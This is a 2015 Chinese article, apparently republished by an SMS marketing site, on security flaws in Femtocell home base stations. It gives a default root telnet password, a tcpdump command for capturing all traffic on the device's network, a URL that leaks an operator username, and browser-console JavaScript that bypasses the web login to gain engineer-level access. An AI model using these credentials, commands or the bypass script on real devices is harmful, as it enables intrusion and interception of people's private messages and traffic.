家庭基站Femtocell截获任意短信漏洞,危及公众移动通信安全
发布时间 :2015-11-23
来源 : 乐信短信平台
移动互联网发展到帐用户对短信、通话、数据流需求剧增,转向互动任意短信需求,而Femtocell设备可以被改造成伪基站短信群发器,截取家庭任意短信隐私,移动短信安全通信漏洞凸显。
近日,有部分运营商通报Femtocell虽能瞬间解决室内ip网络覆盖问题,但是漏洞问题百出,很多厂家已经对全网设备进行紧急修复,漏洞暂时已经修复完成,但是漏洞问题还会存在吗?
乐信揭秘Femtocell任意漏洞三大细节:
①root弱密码
可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
$ telnet 192.168.197.1
login: root
password: 5up
顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。
并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
于是,可以直接抓取到所有连上此WiFi的流量:
busybox tcpdump -i br0 not port 23
② 其它利用方式
/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
闪灯 /mnt/flash/led_ctrl.sh [on|off]
③ RF 板卡渗透:Web 登录绕过
访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
abmoc@24320
然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
SetCookie('role', 'marketUser');
SetCookie('username', 'abmoc@24320');
SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
document.cookie = "loginFlag=1;";
window.top.location = 'main.asp?r=' + Math.random() + '#index';
登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
推荐阅读
- 伪基站群发短信详细介绍 2016-06-13
- 拒收伪基站垃圾短信内容,可选择更换4G USI 2015-04-14
- 伪基站群发商业短信,移动用户通信中断 2015-03-26
- 冬季取暖设施增多 供电局群发短信提醒用电 2013-10-25
最新阅读
- 企业为什么要用短信群发 2023-05-30
- 企业短信群发营销好做吗 2023-05-24
- 为什么短信群发没有效果 2023-05-22
- 怎么短信群发促销宣传 2023-05-18
- 短信群发如何营销 2023-05-17
- 什么软件可以群发短信到手机 2023-05-15